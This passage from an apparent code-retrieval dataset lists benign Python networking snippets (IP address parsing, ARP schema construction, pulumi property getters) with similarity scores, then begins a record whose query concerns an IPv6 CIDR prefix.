tha: 'str | bytes | bytearray' = '00:00:00:00:00:00',\n tpa: 'IPv4Address | IPv6Address | str | bytes | bytearray' = '0.0.0.0', # nosec: B104\n payload: 'bytes | Protocol | Schema' = b'',\n **kwargs: 'Any') -> 'Schema_ARP':\n _htype = self._make_index(htype, htype_default, namespace=htype_namespace,\n reversed=htype_reversed, pack=False)\n _ptype = self._make_index(ptype, ptype_default, namespace=ptype_namespace,\n reversed=ptype_reversed, pack=False)\n _oper = self._make_index(oper, oper_default, namespace=oper_namespace,\n reversed=oper_reversed, pack=False)\n\n return Schema_ARP(\n htype=_htype,\n ptype=_ptype,\n hlen=hlen,\n plen=plen,\n oper=_oper,\n sha=self._make_addr_resolve(sha, _htype),\n spa=self._make_proto_resolve(spa, _ptype),\n tha=self._make_addr_resolve(tha, _htype),\n tpa=self._make_proto_resolve(tpa, _ptype),\n payload=payload,\n )",
"def get_ip_freebind(self):\n if hasattr(socket, \"IP_FREEBIND\"):\n # Valid distribution\n return socket.IP_FREEBIND\n if sys.platform == \"linux2\":\n return 15\n return None",
"def device_type(self) -> str:\n return \"urn:schemas-upnp-org:device:InternetGatewayDevice:1\"",
"def addressing(self) -> Optional[AddressingType]: # pylint: disable=unsubscriptable-object\n return self.pdu_sequence[0].addressing if self.pdu_sequence else None",
"def get_ip_address(self):\n raise NotImplementedError",
"def Address(self) -> _n_5_t_0:",
"def get_preferred_ip(self, ip_type: IPTypes) -> str:\n if ip_type.value in self.ip_addrs:\n return self.ip_addrs[ip_type.value]\n raise CloudSQLIPTypeError(\n \"Cloud SQL instance does not have any IP addresses matching \"\n f\"preference: {ip_type.value})\"\n )",
"def new_ip(address):\n return IPy.IP(address)",
"def __init__(self) -> None:\n self.ip_address: str | None = None",
"def get_type(network: ipaddress.ip_network) -> str:\n for t in TYPES:\n if getattr(network, f\"is_{t}\"):\n return t",
"def ipv4(self):\n return Network(private=True).ipv4",
"def __index__(cls) -> 'Enum_EtherType': # pylint: disable=invalid-index-returned\n return Enum_EtherType.Address_Resolution_Protocol # type: ignore[return-value]",
"def address(self):\n return \"%s:%s\" % (self.ip, self.port)",
"def _get_network_type(self, host):\n network_type = host.get(\"network\")\n default_network = self.config.get(\"default_network\")\n if network_type is None:\n network_type = self._metadata.get(\"network\", default_network)\n if not network_type:\n raise ProvisioningConfigError(\n \"No network type specified and project doesn't have default \"\n \"network type (property 'default_network') specified in \"\n \"provisioning config.\"\n )\n return network_type",
"def __detect_type__(self, value):\n def is_ipv6_address(value):\n try:\n value, interface = value.split('%', 1)\n except: # noqa\n pass\n try:\n parts = value.split(':')\n for part in parts:\n if part == '':\n continue\n part = int(part, 16)\n if part < 0:\n raise ValueError\n return True\n except Exception:\n return False\n\n def is_ipv4_address(value):\n try:\n value, interface = value.split('%', 1)\n except: # noqa\n pass\n try:\n parts = value.split('.', 3)\n for part in parts:\n part = int(part)\n if part < 0 or part > 255:\n raise ValueError\n return True\n except: # noqa\n return False\n\n # Strip port\n if value.startswith('['):\n value = value[1:]\n try:\n value, port = value.split(':', 1)\n except: # noqa\n pass\n\n if value.endswith(']'):\n value = value[:-1]\n\n if is_ipv4_address(value):\n return 1, value, 'ipv4_address'\n\n elif is_ipv6_address(value):\n return 2, value, 'ipv6_address'\n\n else:\n return 0, value, 'hostname'",
"def get_ip_string():\n return netifaces.ifaddresses('br0')[netifaces.AF_INET][0]['addr']",
"def address(self):\n if self.con_strategy == \"local\":\n return self.address_local()\n if self.con_strategy == \"remote\":\n return self.address_remote()\n return None",
"def source_type(self) -> SourceType:\n return SourceType.ROUTER",
"def source_type(self) -> SourceType:\n return SourceType.ROUTER",
"def source_type(self) -> SourceType:\n return SourceType.ROUTER",
"def __init__(\n self, name: str = \"\", protocol: int | None = None, **kwargs: Any\n ) -> None:\n\n super().__init__(name=name, **kwargs)\n\n if protocol not in [None, 4, 6]:\n raise ValueError(\"IpAddress protocol needs to be either 4, 6 or None\")\n self.protocol = protocol",
"def _get_protocol_type(self):\n return self.__protocol_type",
"def __ip2intstr(self, address):\n return str(struct.unpack('!I', address)[0])",
"def new_ip(address):\n return ipaddress.IPv4Address(address)",
"def LocalAddress(self) -> _n_5_t_0:",
"def __init__(self, address, type,):\n self.address = address\n self.type = type",
"def _is_network_type(self, name):\n nt = self.config[\"networks\"].get(name)\n return bool(nt)",
"def get_primary_ip(options, index):\n\n second_octet = 160 + index\n return \"192.%s.1.1\" % second_octet",
"def __init__(\n self, name: str = \"\", protocol: int | None = None, **kwargs: Any\n ) -> None:\n\n super().__init__(name=name, **kwargs)\n if not ipaddress:\n raise SoftDependencyError(\"ipaddress\")\n if protocol not in [None, 4, 6]:\n raise ValueError(\"IpAddress protocol needs to be either 4, 6 or None\")\n self.protocol = protocol",
"def to_python(self, value):\n if isinstance(value, (ipaddress.IPv4Network, ipaddress.IPv6Network)):\n return value\n\n if value is None:\n return value\n\n try:\n return ipaddress.ip_network(value)\n except ValueError:\n raise ValidationError(_(\"Invalid input for an IP network.\"))",
"def ipAddress():\n \n sk = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sk.connect((\"8.8.8.8\", 80))\n ip = (sk.getsockname()[0])\n sk.close()\n return str(ip)",
"def test_create_host_subnet(self):\n pass",
"def get_address(self):\r\n return \"iDigi\"",
"def address_family(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"address_family\")",
"def app_network_access_type(self) -> Optional[pulumi.Input['DomainAppNetworkAccessType']]:\n return pulumi.get(self, \"app_network_access_type\")",
"def guess_network(self):\n # decide what sort of network we are going to use\n # return the actual type\n # right now we just use the first host only network and that's it\n host_only = list(HostOnlyNetwork.find_networks())\n if host_only:\n return host_only[0]\n else:\n return NewHostOnlyNetwork()",
"def SupportsIPv4(self) -> bool:",
"def getIp(self):\n raise NotImplementedError",
"def adjust_ip (self, ip=None):\n if ip != None and ip.haslayer(IP):\n if (self.type == 0x11):\n if (self.gaddr == \"0.0.0.0\"):\n ip.dst = \"224.0.0.1\" # IP rule 1\n retCode = True \n elif isValidMCAddr(self.gaddr):\n ip.dst = self.gaddr # IP rule 3a\n retCode = True\n else:\n print \"Warning: Using invalid Group Address\"\n retCode = False\n elif ((self.type == 0x17) and isValidMCAddr(self.gaddr)):\n ip.dst = \"224.0.0.2\" # IP rule 2\n retCode = True\n elif ((self.type == 0x12) or (self.type == 0x16)) and (isValidMCAddr(self.gaddr)):\n ip.dst = self.gaddr # IP rule 3b\n retCode = True\n else:\n print \"Warning: Using invalid IGMP Type\"\n retCode = False\n else:\n print \"Warning: No IGMP Group Address set\"\n retCode = False\n if retCode == True:\n ip.ttl=1 # IP Rule 4\n ip.options=[IPOption_Router_Alert()] # IP rule 5\n return retCode",
"def is_on_stack(self, address):\n return self.is_address_of_type(address, MemoryType.Stack)",
"def buildProtocol(addr):",
"def type(self) -> Optional[pulumi.Input[Union[str, 'AgentPoolType']]]:\n return pulumi.get(self, \"type\")",
"def server_type(self):\n ...",
"def app_network_access_type(self) -> pulumi.Output[Optional['DomainAppNetworkAccessType']]:\n return pulumi.get(self, \"app_network_access_type\")",
"def get_network_allocations_number(self):\r\n LOG.debug(\"Get network allocations number.\")\r\n return constants.IP_ALLOCATIONS",
"def allocate_address():\n response = EC2.allocate_address(\n )\n return response",
"def __str__(self):\n return \"{}\".format(visiteur.ip)"
] | [
"0.66921926",
"0.6558105",
"0.6343783",
"0.62579095",
"0.6204035",
"0.61733663",
"0.60489833",
"0.6027968",
"0.590761",
"0.5870783",
"0.57298845",
"0.5710156",
"0.569875",
"0.5694414",
"0.5689083",
"0.5678903",
"0.5581792",
"0.5554217",
"0.5541468",
"0.55387825",
"0.5525745",
"0.55044353",
"0.55011237",
"0.5486684",
"0.5449133",
"0.5444622",
"0.54439265",
"0.54439265",
"0.5438365",
"0.5434098",
"0.54337263",
"0.54220146",
"0.54215086",
"0.5400311",
"0.53990924",
"0.53750294",
"0.53706646",
"0.5356622",
"0.53405666",
"0.5335872",
"0.5334917",
"0.53232276",
"0.5311669",
"0.5299823",
"0.5293537",
"0.5280677",
"0.5266033",
"0.5264635",
"0.52623934",
"0.52623934",
"0.5261298",
"0.5239982",
"0.52353704",
"0.5234466",
"0.5227017",
"0.52248585",
"0.52146244",
"0.52139854",
"0.52075285",
"0.51957333",
"0.5188182",
"0.5170947",
"0.516927",
"0.51688737",
"0.5168697",
"0.5167536",
"0.51347405",
"0.5131819",
"0.5124529",
"0.51238346",
"0.5104629",
"0.5104629",
"0.5104629",
"0.5102564",
"0.5093965",
"0.5091164",
"0.50869805",
"0.50857097",
"0.5078986",
"0.50723845",
"0.5067969",
"0.5061323",
"0.5042722",
"0.5033845",
"0.50227296",
"0.50064415",
"0.49977282",
"0.4990625",
"0.49844098",
"0.49809164",
"0.49645197",
"0.4952559",
"0.49496102",
"0.4946586",
"0.49462265",
"0.49414185",
"0.49401394",
"0.4938156",
"0.49322572",
"0.49314168"
] | 0.60764885 | 6 |
The IPV4 prefix (CIDR) assigned to this L3 network. Required when the IP allocation type is IPV4 or DualStack. | def ipv4_connected_prefix(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "ipv4_connected_prefix") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def local_ipv4_network_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"local_ipv4_network_cidr\")",
"def local_ipv4_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv4_network_cidr\")",
"def local_ipv4_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv4_network_cidr\")",
"def ipv4(self):\n return Network(private=True).ipv4",
"def ipv4_connected_prefix(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"ipv4_connected_prefix\")",
"def ipv4_address(self) -> str:\n return pulumi.get(self, \"ipv4_address\")",
"def ipv4_address(self) -> str:\n return pulumi.get(self, \"ipv4_address\")",
"def ipv4_cidr_block(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv4_cidr_block\")",
"def ipv4_address_space(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"ipv4_address_space\")",
"def ipv4_address_space(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv4_address_space\")",
"def network(self):\n address = unicode(\"%s/%s\" % (self.address, _get_cidr(self.netmask)))\n return IPv4Network(address, strict=False)",
"def cluster_ipv4_cidr(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"This field is deprecated, use cluster_ipv4_cidr_block.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"cluster_ipv4_cidr is deprecated: This field is deprecated, use cluster_ipv4_cidr_block.\"\"\")\n\n return pulumi.get(self, \"cluster_ipv4_cidr\")",
"def prefixes_ipv4(self):\n with open(self.ixpfx) as f:\n ixpfx = json.load(f)\n return [item['prefix'] for item in ixpfx['data'] if item['protocol'] == 'IPv4']",
"def ipv4_address(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv4_address\")",
"def remote_ipv4_network_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"remote_ipv4_network_cidr\")",
"def node_ipv4_cidr(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"This field is deprecated, use node_ipv4_cidr_block.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"node_ipv4_cidr is deprecated: This field is deprecated, use node_ipv4_cidr_block.\"\"\")\n\n return pulumi.get(self, \"node_ipv4_cidr\")",
"def _get_ipv4(self):\n return self.__ipv4",
"def _get_ipv4(self):\n return self.__ipv4",
"def _get_ipv4(self):\n return self.__ipv4",
"def subnet_prefix(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"subnet_prefix\")",
"def remote_ipv4_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"remote_ipv4_network_cidr\")",
"def remote_ipv4_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"remote_ipv4_network_cidr\")",
"def get_ipv4_address(self):\n \n ipv4_address = self._dhcp_client_ctrl.getIpv4Address()\n if ipv4_address is None:\n return None\n else:\n return unicode(ipv4_address)",
"def getIpv4Netmask(self):\n with self.status._dhcp_status_mutex:\n if self.status.ipv4_lease_valid is None:\n return None\n else:\n return self.status.ipv4_netmask",
"def master_ipv4_cidr_block(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"master_ipv4_cidr_block\")",
"def local_ipv6_network_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"local_ipv6_network_cidr\")",
"def ip_address_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_address_prefix\")",
"def normalize_ip4(self):\n\n ip = str(self.ip4)\n # Let's normalize the ip list first\n ip_list = list(\n map(\n lambda v: ipaddress.IPv4Network(v),\n filter(\n lambda v: self.try_convert(v, None, ipaddress.IPv4Network),\n map(\n lambda v: v.split('|')[1].split('/')[0].strip()\n if '|' in v else\n v.split('/')[0].strip(),\n ip.split(',')\n )\n )\n )\n )\n\n if ip_list:\n ip_list.sort()\n ip = tuple(\n int(c)\n for c in str(ip_list[0]).split('/')[0].split('.')\n )\n else:\n ip = (9999, ip)\n\n self.ip4 = ip",
"def node_ipv4_cidr_size(self) -> int:\n return pulumi.get(self, \"node_ipv4_cidr_size\")",
"def cidr(self):\n return self._cidr",
"def prefixlen(self):\n return self._ip_range.prefixlen",
"def local_ipv6_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv6_network_cidr\")",
"def local_ipv6_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv6_network_cidr\")",
"def NoOfAddressPrefix(self):\n return self._get_attribute('noOfAddressPrefix')",
"def get_ipv4_netmask(self):\n \n ipv4_netmask = self._dhcp_client_ctrl.getIpv4Netmask()\n if ipv4_netmask is None:\n return None\n else:\n return unicode(ipv4_netmask)",
"def cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"cidr\")",
"def cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"cidr\")",
"def Ipv4Flag(self):\r\n\t\treturn self._get_attribute('ipv4Flag')",
"def getIpv4Address(self):\n with self.status._dhcp_status_mutex:\n if self.status.ipv4_lease_valid is None:\n return None\n else:\n return self.status.ipv4_address",
"def get_address(self):\n return self.get_ipv4_address()",
"def cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cidr\")",
"def cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cidr\")",
"def cidr(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cidr\")",
"def cidr(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cidr\")",
"def services_ipv4_cidr(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"This field is deprecated, use services_ipv4_cidr_block.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"services_ipv4_cidr is deprecated: This field is deprecated, use services_ipv4_cidr_block.\"\"\")\n\n return pulumi.get(self, \"services_ipv4_cidr\")",
"def __str__(self):\n retval = \"IPv4\\n\"\n for field in self.layout:\n if (field.name == \"src\" or field.name == \"dst\"):\n value = inet_ntop(AF_INET,\n struct.pack('!L', self.__dict__[field.name]))\n retval += \"%s %s\\n\" % (field.name, value)\n else:\n retval += \"%s %s\\n\" % (field.name, self.__dict__[field.name])\n return retval",
"def allocate_subnet(self):\n if len(self.subnet_list) == 0:\n subnet = '192.168.1.0/24'\n self.subnet_list.append(subnet)\n return subnet\n else:\n subnet = self.subnet_list[::-1][0]\n ip = ipaddress.IPv4Network(subnet)[0]\n s = ipaddress.IPv4Address(ip) + 256\n return '{}{}'.format(s, '/24')",
"def Ipv4rate(self):\n\t\treturn self._get_attribute('ipv4rate')",
"def reverse_prefix(self):\n if self.type == ZONE_REVERSE_IPV4:\n # Get IPv4 prefix covering reverse zone\n n = self.name.lower()\n if n.endswith(\".in-addr.arpa\"):\n r = n[:-13].split(\".\")\n r.reverse()\n length = 4 - len(r)\n r += [\"0\"] * length\n ml = 32 - 8 * length\n return \".\".join(r) + \"/%d\" % ml\n elif self.type == ZONE_REVERSE_IPV6:\n # Get IPv6 prefix covering reverse zone\n n = self.name.lower()\n if n.endswith(\".ip6.int\"):\n n = n[:-8]\n elif n.endswith(\".ip6.arpa\"):\n n = n[:-9]\n else:\n raise Exception(\"Invalid IPv6 zone suffix\")\n p = n.split(\".\")\n p.reverse()\n length = len(p)\n if length % 4:\n p += [\"0\"] * (4 - length % 4)\n r = \"\"\n for i, c in enumerate(p):\n if i and i % 4 == 0:\n r += \":\"\n r += c\n if len(p) != 32:\n r += \"::\"\n prefix = r + \"/%d\" % (length * 4)\n return IPv6(prefix).normalized.prefix",
"def address_prefix(self) -> Optional[str]:\n return pulumi.get(self, \"address_prefix\")",
"def test_ip4_cidr_syntax_internal_v6(self):\n \n test_ip = ip_address.IPAddress(\"192.168.0.1/24\")\n \n assert test_ip.addr == [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xff, 192, 168, 0, 1]\n assert test_ip.subnet == [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0]\n \n test_ip = ip_address.IPAddress(\"127.0.0.1/16\") \n assert test_ip.addr == [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]\n assert test_ip.subnet == [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0, 0]\n \n test_ip = ip_address.IPAddress(\"127.0.0.1/8\")\n assert test_ip.subnet == [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0]\n \n test_ip = ip_address.IPAddress(\"127.0.0.1\")\n assert test_ip.subnet == []",
"def test_IPv4s_to_valid_CIDR(self):\n self.assertEqual(\n helpers.IPRange_to_valid_CIDR('192.168.0.1', '192.168.0.1'),\n '192.168.0.1/32'\n )",
"def to_network_v4(zone: Zone) -> ipaddress.IPv4Network:\n\n labels = zone.name.split(\".\")[:-3]\n netmask: int = 8 * len(labels)\n offset = 4 - len(labels)\n\n pattern = r\"^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)([/-](2[5-9]|3[0-1]))?$\"\n last_label_parsed = re.search(pattern, labels[0])\n if not last_label_parsed:\n raise ValueError(\"Faild to parse the zone name\")\n\n if last_label_parsed[2]:\n # non-octet boundary delegation detected\n # remove netmask and save it to the result\n last_octect = last_label_parsed[1]\n labels[0] = last_octect\n netmask = int(last_label_parsed[2][1:])\n\n labels = [\"0\"] * offset + labels\n prefix_str = \".\".join(reversed(labels))\n prefix_str += f\"/{netmask}\"\n\n return ipaddress.IPv4Network(prefix_str, strict=True)",
"def customer_owned_ipv4_pool(self) -> str:\n return pulumi.get(self, \"customer_owned_ipv4_pool\")",
"def public_ip_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]]]:\n return pulumi.get(self, \"public_ip_prefixes\")",
"def getnetwork(ipaddr):\n return '192.168.1.0/24'",
"def PrefixIpv6Address(self):\n if self.force_auto_sync:\n self.get('PrefixIpv6Address')\n return self._PrefixIpv6Address",
"def get_ip4_adresses(self):\n self._search_regx(self.PATTERN_IP4)\n return self._ip_adresses",
"def get_netmask(self):\n return self.get_ipv4_netmask()",
"def cidr_block(self):\n return self._cidr_block",
"def ipv6_connected_prefix(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"ipv6_connected_prefix\")",
"def ip4range(iprange):\n assert not ('/' in iprange and '-' in iprange),'cidr and dash notation is not possible'\n if '/' in iprange:\n #cidr range\n ippart,mask=iprange.split('/',1)\n mask=int(mask)\n ip=ip_pad(ippart)\n lowerlong,upperlong=cidr2lowerupper(ip,mask)\n lowerip=long2ip(lowerlong)\n upperip=long2ip(upperlong)\n \n elif '-' in iprange:\n lpart,upart=iprange.split('-',1)\n lowerip=ip_pad(lpart)\n \n #upperip only one octet? fill last specified octed from lpart\n if '.' not in upart:\n sp=lpart.split('.')\n sp[-1]=upart\n upart='.'.join(sp)\n \n upperip=ip_pad(upart,True)\n else:\n lowerip=ip_pad(iprange)\n upperip=ip_pad(iprange,True)\n \n return lowerip,upperip",
"def subnet_prefix_length(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"subnet_prefix_length\")",
"def format_ipv4(value, mask=None):\n value_ipv4 = \".\".join([str(int(x, 16)) for x in re.findall('..', \"{:08x}\".format(value))])\n if mask is None:\n return value_ipv4\n value_mask = \".\".join([str(int(x, 16)) for x in re.findall('..', \"{:08x}\".format(mask))])\n return \"{}/{}\".format(value_ipv4, value_mask)",
"def _validate_network_prefix(self):\n try:\n cidr = netaddr.IPNetwork(self.network + \"/\" + str(self.prefix))\n except netaddr.core.AddrFormatError:\n raise ValueError(_(\"Invalid IP address and prefix\"))\n address = netaddr.IPAddress(self.network)\n if address != cidr.network:\n raise ValueError(_(\"Invalid IP network %(address)s/%(prefix)s \"\n \"expecting %(network)s/%(prefix)s\") %\n {'address': self.network,\n 'prefix': self.prefix,\n 'network': cidr.network})",
"def get_main_ipv4():\n try:\n # No data is actually transmitted (UDP)\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect( ('8.8.8.8', 53) )\n real_ip = s.getsockname()[0]\n s.close()\n return real_ip\n except socket.error as e:\n logging.error(\"Cannot retrieve current IPv4 address: %s\" % e)\n return None",
"def ipv6_connected_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv6_connected_prefix\")",
"def isIpv4AddrWithNetmask(string):\n return (True)",
"def get_min_addr(self):\n\n out = None\n for segment in self.segments:\n if out is None or segment.min_addr < out:\n out = segment.min_addr\n\n if out is None:\n for section in self.sections:\n if out is None or section.min_addr < out:\n out = section.min_addr\n\n if out is None:\n return self.rebase_addr\n else:\n return out + self.rebase_addr",
"def get_dns_name_prefix(self) -> Union[str, None]:\n return self._get_dns_name_prefix(enable_validation=True)",
"def ip(self):\n if not self._ip:\n if 'ip' in self.config:\n ip = self.config['ip']\n else:\n ip = self.protocol.transport.get_extra_info('sockname')[0]\n ip = ip_address(ip)\n if ip.version == 4:\n self._ip = ip\n else: # pragma: no cover\n response = urlopen('http://ipv4.icanhazip.com/')\n ip = response.read().strip().decode()\n ip = ip_address(ip)\n self._ip = ip\n return self._ip",
"def tunnel1_inside_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"tunnel1_inside_cidr\")",
"def tunnel1_inside_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"tunnel1_inside_cidr\")",
"def encode_ipv4(self, input):\n return inet_aton(input)",
"def get_ipv4_defaultgw(self):\n \n ipv4_defaultgw = self._dhcp_client_ctrl.getIpv4DefaultGateway()\n if ipv4_defaultgw is None:\n return None\n else:\n return unicode(ipv4_defaultgw)",
"def _rloc_ip_net_addr(self):\n self.net_addr = ':'.join(self.rloc.split(':')[:-1]) + ':'\n return self.net_addr",
"def find_ipv4():\n try:\n r = requests.get(v4_url)\n tree = html.fromstring(r.content)\n result = tree.xpath('//body/text()')\n result = result[0].split()\n ipv4 = result[len(result)-1]\n except:\n if cfg['debug']:\n print(\"Couldn't connect to %s\" % v4_url)\n print(\"Check that you have a valid IPv4 default route\")\n ipv4 = None\n\n return ipv4",
"def tunnel1_inside_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"tunnel1_inside_cidr\")",
"def isofy_ipv4(ip_string, prefix=\"\"):\n ipaddress.IPv4Address(ip_string) # fails for invalid IP\n\n if prefix != \"\":\n prefix_valid = bool(re.match(r\"^.{2}(\\..{4})*?$\", prefix))\n if not prefix_valid:\n raise ValueError(f\"{prefix} cannot be used as ISO prefix, please check formatting\")\n prefix += \".\"\n # IP: split and fill with 0s\n ip_parts = ip_string.split(\".\")\n padded = [p.zfill(3) for p in ip_parts]\n joined = \"\".join(padded)\n # IP: split to chunks à 4 chars\n chunksize = 4\n ip_chunks = [joined[i : i + chunksize] for i in range(0, len(joined), chunksize)]\n # combine\n iso_address = prefix + \".\".join(ip_chunks) + \".00\"\n return iso_address",
"def pod_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"pod_cidr\")",
"def pod_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"pod_cidr\")",
"def source_cidr_block(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"source_cidr_block\")",
"def min_addr(self):\n return self.vaddr",
"def update_gateway_with_prefixlen(self, ipv4='', ipv4_prefixlen=0, \n ipv6='', ipv6_prefixlen=0, port_no=''):\n port = self.ports[port_no]\n\n if port.gateway is None:\n port.gateway = Gateway(name=port.name, port_no=port.port_no,\n ipv4=ipv4, ipv4_prefixlen=ipv4_prefixlen,\n ipv6=ipv6, ipv6_prefixlen=ipv6_prefixlen)\n else:\n port.gateway.name = port.name\n port.gateway.ipv4 = netaddr.IPAddress(ipv4)\n port.gateway.ipv4_subnet = netaddr.IPNetwork(ipv4 + '/' + str(ipv4_prefixlen))\n port.gateway.ipv6 = netaddr.IPAddress(ipv6)\n port.gateway.ipv6_subnet = netaddr.IPNetwork(ipv6 + '/' + str(ipv6_prefixlen))\n port.gateway.port_no = port.port_no\n\n self.tbl.update_entry(subnet=port.gateway.ipv4_subnet, receive_port=port, metric=0, source=\"CONNECTED\")",
"def get_node_ip(self, prefix_db: openr_types.PrefixDatabase) -> Any:\n\n # First look for LOOPBACK prefix\n for prefix_entry in prefix_db.prefixEntries:\n if prefix_entry.type == network_types.PrefixType.LOOPBACK:\n return ipnetwork.sprint_addr(prefix_entry.prefix.prefixAddress.addr)\n\n # Else return None\n return None",
"def address_space_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"address_space_prefixes\")",
"def network(ip):\n ip, prefix = netParse(ip)\n return \"{}/{}\".format(\n ipStr(ip & (0xffffffff << (32 - prefix))),\n prefix\n )",
"def address_to_ip_prefix(address):\n return address.split('/')",
"def source_cidr_block(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"source_cidr_block\")",
"def uuid_prefix(self) -> str:\n return str(self.uuid)[:-4]",
"def test_IPv4_to_CIDR(self):\n match_list = '1.2.3.0/29'\n self.assertEqual(helpers.IPRange_to_CIDR('1.2.3.1', '1.2.3.6'), match_list)",
"def get_network(address: str, netmask: str) -> IPv4Network:\n net = IPv4Network(f\"{address}/{netmask}\", strict=False)\n return net",
"def ipv4_addresses(self) -> Dict[str, List[IPv4Address]]:\n log.debug(\"Host %s: ipv4 addresses of the devices interfaces %s.\", self.host, self._get_ipv4_addresses(\"self\"))\n return self._get_ipv4_addresses(\"self\")",
"def transit_router_cidr_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"transit_router_cidr_id\")",
"def ipv4_enabled(self) -> bool:\n return pulumi.get(self, \"ipv4_enabled\")",
"def cidr_block(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cidr_block\")",
"def address_space_prefixes(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"address_space_prefixes\")",
"def ipv4_enabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"ipv4_enabled\")",
"def source_cidr_block(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"source_cidr_block\")",
"def address(self):\n return f'Address = {self._peer.address}/{self._peer.subnet.prefixlen}'"
] | [
"0.74853224",
"0.73985845",
"0.73985845",
"0.72560716",
"0.72186995",
"0.68104565",
"0.68104565",
"0.6797192",
"0.66854614",
"0.6672047",
"0.65196866",
"0.6441253",
"0.64102024",
"0.64046043",
"0.6388265",
"0.6357316",
"0.63264906",
"0.63264906",
"0.63264906",
"0.6296035",
"0.6267834",
"0.6267834",
"0.62537485",
"0.6236046",
"0.6205779",
"0.62007993",
"0.62001145",
"0.61688733",
"0.61575806",
"0.61488265",
"0.61063373",
"0.60362965",
"0.60362965",
"0.60032237",
"0.5989894",
"0.5910071",
"0.5910071",
"0.5891082",
"0.58376473",
"0.583705",
"0.58317065",
"0.58317065",
"0.5797725",
"0.5797725",
"0.57586324",
"0.5756452",
"0.5753612",
"0.57517356",
"0.5697386",
"0.5689427",
"0.5688877",
"0.56671184",
"0.5658577",
"0.5633485",
"0.5608565",
"0.5606508",
"0.56031954",
"0.5563074",
"0.5525189",
"0.5516327",
"0.5484276",
"0.54725695",
"0.54685086",
"0.5463351",
"0.54633313",
"0.54579604",
"0.54561466",
"0.54401886",
"0.53892183",
"0.5369914",
"0.5367008",
"0.53639764",
"0.53639764",
"0.5360987",
"0.53511745",
"0.5346809",
"0.5315047",
"0.5309648",
"0.5303447",
"0.5299599",
"0.5299599",
"0.5296356",
"0.5290755",
"0.5284695",
"0.52762604",
"0.52696246",
"0.5265343",
"0.52636945",
"0.5260749",
"0.52598155",
"0.5259148",
"0.5256177",
"0.52449846",
"0.5243726",
"0.5241658",
"0.52311844",
"0.52180994",
"0.52114046",
"0.52112955",
"0.5207764"
] | 0.72907937 | 3 |
The IPV6 prefix (CIDR) assigned to this L3 network. Required when the IP allocation type is IPV6 or DualStack. | def ipv6_connected_prefix(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "ipv6_connected_prefix") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
